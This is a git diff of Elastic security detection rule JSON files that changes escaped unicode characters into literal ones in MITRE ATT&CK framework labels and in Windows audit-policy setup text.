+ "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_110.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_110.json
index be9735d0a60..63374d5c4a6 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_110.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_110.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1",
- "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```",
+ "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_111.json b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_111.json
index 93b380ce015..e9e6c3adaec 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_111.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f962927-1a4f-45f3-a57b-287f2c7029c1_111.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "9f962927-1a4f-45f3-a57b-287f2c7029c1",
- "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Access (Success,Failure)\n```\n",
+ "setup": "\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_102.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_102.json
index 495f873c2db..7fb7b59ad42 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_103.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_103.json
index 011bf3d8473..b2befb9c1c6 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_103.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_104.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_104.json
index b37cb9539b9..ffae2965c5c 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_104.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_105.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_105.json
index ccb4175ae32..c0aec0b95d4 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_105.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_206.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_206.json
index d49ca7d77fe..aa2abca750c 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_206.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_207.json b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_207.json
index 61b2401bab4..a53dfd78301 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f9a2a82-93a8-4b1a-8778-1780895626d4_207.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_105.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_105.json
index 7094f7221fe..34d0eedcd84 100644
--- a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_105.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_205.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_205.json
index c8ea371bb36..4e02399ba6f 100644
--- a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_205.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_206.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_206.json
index f5185971a41..dffd9ee0b47 100644
--- a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_206.json
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_207.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_207.json
index 2b38945e7f1..4c0c4dce48f 100644
--- a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_207.json
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_308.json b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_308.json
index cd0745cbab6..00ae50879a4 100644
--- a/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_308.json
+++ b/packages/security_detection_engine/kibana/security_rule/a00681e3-9ed6-447c-ab2c-be648821c622_308.json
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_5.json b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_5.json
index ff3b20a472c..5c904f032a4 100644
--- a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_5.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_6.json b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_6.json
index d788915f2a9..393d8b4eca2 100644
--- a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_6.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_7.json b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_7.json
index 770ad3c7436..9ca3c8d91e6 100644
--- a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_7.json
+++ b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_7.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_8.json b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_8.json
index 135b69c4c48..078725a11b2 100644
--- a/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_8.json
+++ b/packages/security_detection_engine/kibana/security_rule/a02cb68e-7c93-48d1-93b2-2c39023308eb_8.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_1.json b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_1.json
index c3ef848e316..b03888782fc 100644
--- a/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_1.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_2.json b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_2.json
index 17d8b28e598..731833f10a0 100644
--- a/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/a0ddb77b-0318-41f0-91e4-8c1b5528834f_2.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_104.json b/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_104.json
index 655541c9248..f9bef8cf616 100644
--- a/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_104.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_105.json b/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_105.json
index 75b86dd2230..5c758ea581c 100644
--- a/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a10d3d9d-0f65-48f1-8b25-af175e2594f5_105.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_103.json b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_103.json
index 1c9fc1cb031..1b3e2695e4d 100644
--- a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_104.json b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_104.json
index 674b9dc6454..edff695dd60 100644
--- a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_104.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_105.json b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_105.json
index 1ac7925ba44..97254e98704 100644
--- a/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a13167f1-eec2-4015-9631-1fee60406dcf_105.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_103.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_103.json
index 12c54b2f33f..1699e6df527 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_103.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_104.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_104.json
index f4cf62692e9..0fa2749322b 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_104.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_105.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_105.json
index 15ac4fd063e..dd600686b62 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_105.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_106.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_106.json
index 454ca957de7..5267ca0dade 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_106.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_107.json b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_107.json
index 97c719372e8..967ce71ee64 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1329140-8de3-4445-9f87-908fb6d824f4_107.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_103.json b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_103.json
index 1491d84e404..38759ffd3a3 100644
--- a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_103.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a16612dd-b30e-4d41-86a0-ebe70974ec00",
- "setup": "This is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "This is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_104.json b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_104.json
index 55e9d74481d..9919088abe6 100644
--- a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_104.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a16612dd-b30e-4d41-86a0-ebe70974ec00",
- "setup": "This is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "This is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_105.json b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_105.json
index c3965a48384..c3e483d519c 100644
--- a/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/a16612dd-b30e-4d41-86a0-ebe70974ec00_105.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 73,
 "rule_id": "a16612dd-b30e-4d41-86a0-ebe70974ec00",
- "setup": "\nThis is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nThis is meant to run only on datasources using Windows security event 4688 that captures the process clone creation.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_2.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_2.json
index c16b1a2398f..d03ed95a84a 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_2.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_3.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_3.json
index 757f14c38cf..62f60aaaafe 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_3.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_4.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_4.json
index 2d032823306..72f77660984 100644
--- a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_4.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_5.json b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_5.json
new file mode 100644
index 00000000000..ed4d5c76298
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/a1699af0-8e1e-4ed0-8ec1-89783538a061_5.json
